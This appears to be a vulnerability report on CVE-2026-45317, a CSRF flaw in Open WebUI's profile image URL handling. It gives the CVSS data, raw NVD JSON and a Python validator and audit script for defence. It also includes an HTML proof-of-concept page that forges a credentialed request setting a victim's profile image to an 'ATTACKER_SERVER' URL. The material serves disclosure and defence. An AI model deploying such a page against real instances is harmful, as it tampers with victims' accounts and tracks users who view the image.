Security Vulnerability Report
CVE-2026-45317 CVSS 4.6 MEDIUM

Published: 2026-05-15 22:16:55
Last Modified: 2026-05-15 22:16:55

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, an application-wide Cross-Site Request Forgery (CSRF) vulnerability was found in Open-WebUI's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This vulnerability is fixed in 0.9.3.

Reading of the vector: the image "upload" accepts a URL rather than image bytes, stores it without validation, and renders it as an <img> for every user who views the profile. Each viewer's browser then issues the GET with no interaction beyond viewing the page; if the stored URL points back at the Open WebUI host itself, that request carries the viewer's session cookie, which is the CSRF. PR:L in the vector reflects that the attacker needs only an ordinary account, and UI:R that a victim has to view the image.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No NVD configuration (CPE) data is available for this entry yet (vulnStatus: Received). Affected range, taken from the advisory text:

Open WebUI < 0.9.3 (fixed in 0.9.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.

Note on scope: the advisory describes an authenticated attacker using their own session to set an image URL that other users' browsers will then fetch. The snippet below instead forges the profile-update request cross-site against a victim's session; both variants rely on the same missing server-side validation of the image URL. The endpoint path and payload field are placeholders and are not confirmed against Open WebUI's API.
html
<!--
  PoC for CVE-2026-45317: Open WebUI CSRF Vulnerability
  Description: This HTML snippet demonstrates how an attacker could craft a
  malicious page to update a victim's profile image to a URL controlled by the
  attacker.
  Usage: Host this file and trick an authenticated Open WebUI user into
  visiting it.
-->
<html>
  <body>
    <h2>CSRF PoC for Open WebUI</h2>
    <p>Attempting to update profile image via CSRF...</p>
    <script>
      // Target URL of the vulnerable Open WebUI instance
      const targetHost = "http://TARGET_OPENWEBUI_HOST";
      // Placeholder endpoint: the real path and payload structure depend on the
      // target's API implementation and must be confirmed against it first.
      const apiUrl = `${targetHost}/api/v1/user/update`;

      // Malicious payload: the stored image URL points at an attacker-controlled
      // endpoint. Every user whose browser renders the image then issues a GET
      // to it; the attacker's server logs source IP, User-Agent and (policy
      // permitting) Referer. document.cookie on this page would only read the
      // attacker page's own cookies, not the victim's Open WebUI session, so
      // nothing is appended to the URL here.
      const maliciousImageUrl = "http://ATTACKER_SERVER/steal.jpg";

      const payload = {
        "profile_image_url": maliciousImageUrl
      };

      // Caveat: a cross-origin fetch with Content-Type: application/json is not
      // a "simple" request, so the browser sends a CORS preflight (OPTIONS)
      // first and only issues the POST if the target allows this origin with
      // credentials. The victim's cookies are also only attached if the session
      // cookie is not SameSite=Lax/Strict. A form-encoded POST avoids the
      // preflight but only works if the endpoint accepts that encoding.
      fetch(apiUrl, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        credentials: 'include', // Crucial: sends the victim's cookies with the request
        body: JSON.stringify(payload)
      })
      .then(response => {
        if (response.ok) {
          console.log("CSRF Attack Successful: Profile image updated.");
          document.body.innerHTML += "<p>Attack Successful! Check console.</p>";
        } else {
          console.log("CSRF Attack Failed.");
        }
      })
      .catch(error => {
        console.error("Error:", error);
      });
    </script>
  </body>
</html>
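As an added example for this report (not Open WebUI's code, and not the fix shipped in 0.9.3), the following Python shows the two controls the description and the PoC above call for: a server-side check that only accepts an image reference the application can safely render, with a deliberately weak check beside it for contrast, and an audit over existing user rows to find URLs planted before a fix. The app origin, the field name profile_image_url, the /static/uploads/ prefix, the size cap and the sample rows are all constructed assumptions; the API path stored under user u3 is hypothetical.

```python
"""Validation and audit of user-supplied profile image URLs.

Added example for this report, not Open WebUI's own code. Assumptions: the
app origin, the field name profile_image_url, the /static/uploads/ prefix, the
size cap and the sample rows below are all constructed for illustration.
"""
import base64
import binascii
import re
from urllib.parse import urlsplit

APP_ORIGIN = "https://chat.example.internal"   # assumed deployment origin
MAX_IMAGE_BYTES = 512 * 1024                     # assumed inline-image cap

# Leading bytes of the formats accepted inline (WebP is checked on "RIFF" only).
_MAGIC = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "image/gif": b"GIF8",
    "image/webp": b"RIFF",
}
_DATA_URL = re.compile(
    r"^data:(image/(?:png|jpeg|gif|webp));base64,([A-Za-z0-9+/=\s]+)$")


def weak_is_acceptable(url: str) -> bool:
    """A check that lets the advisory's attack through: any http(s) or data:
    value is stored verbatim and later rendered as <img src=...> for every viewer."""
    return url.startswith(("http://", "https://", "data:"))


def classify_image_url(url: str, app_origin: str = APP_ORIGIN) -> str:
    """Return "ok" or a rejection reason.

    Only two shapes are accepted: a base64 data: URL carrying a real,
    size-bounded image, or a relative path under the app's own upload prefix.
    Every absolute URL is refused. A URL at the app's own host is singled out
    ("self-origin") because an <img> pointing at the app's API is exactly the
    cookie-bearing GET from viewers' browsers that the advisory describes.
    """
    m = _DATA_URL.match(url)
    if m:
        mime, b64 = m.group(1), re.sub(r"\s+", "", m.group(2))
        try:
            raw = base64.b64decode(b64, validate=True)
        except binascii.Error:
            return "bad-data-url"
        if not raw or len(raw) > MAX_IMAGE_BYTES or not raw.startswith(_MAGIC[mime]):
            return "bad-data-url"
        return "ok"
    if url.lower().startswith("data:"):
        return "bad-data-url"          # data: URL of a non-image type or malformed
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:   # absolute or protocol-relative (//host/...)
        app_host = urlsplit(app_origin).hostname
        if parts.hostname and parts.hostname == app_host:
            return "self-origin"
        return "external"
    if url.startswith("/static/uploads/") and ".." not in url:
        return "ok"
    return "bad-path"


def audit_profile_images(users, app_origin: str = APP_ORIGIN):
    """Return [(user_id, reason)] for rows whose stored URL fails the check.

    Run this over the user table after upgrading: a check applied on write
    does not by itself clean values that were stored before it existed."""
    flagged = []
    for u in users:
        reason = classify_image_url(u["profile_image_url"], app_origin)
        if reason != "ok":
            flagged.append((u["id"], reason))
    return flagged


# Constructed sample rows (not real data). The API path under u3 is hypothetical.
GOOD_PNG_DATA_URL = "data:image/png;base64," + base64.b64encode(
    _MAGIC["image/png"] + bytes(16)).decode()
SAMPLE_USERS = [
    {"id": "u1", "profile_image_url": GOOD_PNG_DATA_URL},
    {"id": "u2", "profile_image_url": "http://ATTACKER_SERVER/steal.jpg"},
    {"id": "u3", "profile_image_url": APP_ORIGIN + "/api/v1/some-state-changing-get"},
    {"id": "u4", "profile_image_url": "/static/uploads/u4.png"},
]

if __name__ == "__main__":
    for uid, reason in audit_profile_images(SAMPLE_USERS):
        print(f"{uid}: {reason}")
```

Running the module prints the two flagged rows (u2 external, u3 self-origin). A Content-Security-Policy of `img-src 'self' data:` is a useful second layer because it stops viewers' browsers from fetching the external variant even if a bad value reaches the database, but it does nothing against the self-origin variant, since 'self' permits it; that case is closed only by refusing absolute URLs on write and by never letting a GET endpoint change state.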

References

https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m (GitHub security advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45317", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:54.520", "lastModified": "2026-05-15T22:16:54.520", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, an application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This vulnerability is fixed in 0.9.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m", "source": "[email protected]"}]}}